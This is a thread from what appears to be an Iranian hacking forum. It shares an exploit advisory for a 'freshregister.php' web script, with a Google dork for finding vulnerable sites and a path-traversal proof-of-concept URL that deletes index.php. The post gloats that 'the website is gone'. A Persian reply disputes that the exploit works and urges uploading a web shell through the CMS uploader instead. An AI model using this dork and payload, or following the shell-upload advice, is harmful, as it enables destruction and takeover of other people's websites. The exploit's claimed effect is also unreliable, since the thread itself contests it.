ts icon
سرور تیم اسپیک گاردایران

پست های پیشنهاد شده

https://cxsecurity.com/issue/WLB-2018020296

##############################################################################
# Title: freshregister.php remote file deleting 
# vendor: n/a
# Exploit Author : Guardiran Security Team
# Tested On : ubuntu / Windows 8.1
# 
# Dork: inurl:freshregister.php
# 
# -----------------------------------------------
#
#
# Description :
# an authenticated user profile pic remover can delete the whole website and config files 
# 
# 
# 
# Poc:
# http://sitedomain.com/deletephoto.php?Choice=1&op=../index.php
# and the website is gone :)))
# 
# 
# 
# 
# you can delete what ever you want such as pics or files :))
# 
# 
#
#
#
#
##############################################################################

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

با سلام و تشکر

باید بگم تا جایی که من تست کردم اکسپلویت کاملا بی استفاده هست و کار نمیکنه

نکته: یو آر ال درست هست ولی اگر عضو سایت نباشید باید یوزر پسورد وارد کنی اگر عضو باشی فقط عکس و فایل هایی که خودتون آپلود کردید رو میتونید حذف کنید

تلاشتون قابل تقدیر هست ولی بهتره زمانتون رو صرف آپلود شل از طریق آپلودر کنید ( منظورم همین سی ام اس هست )

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری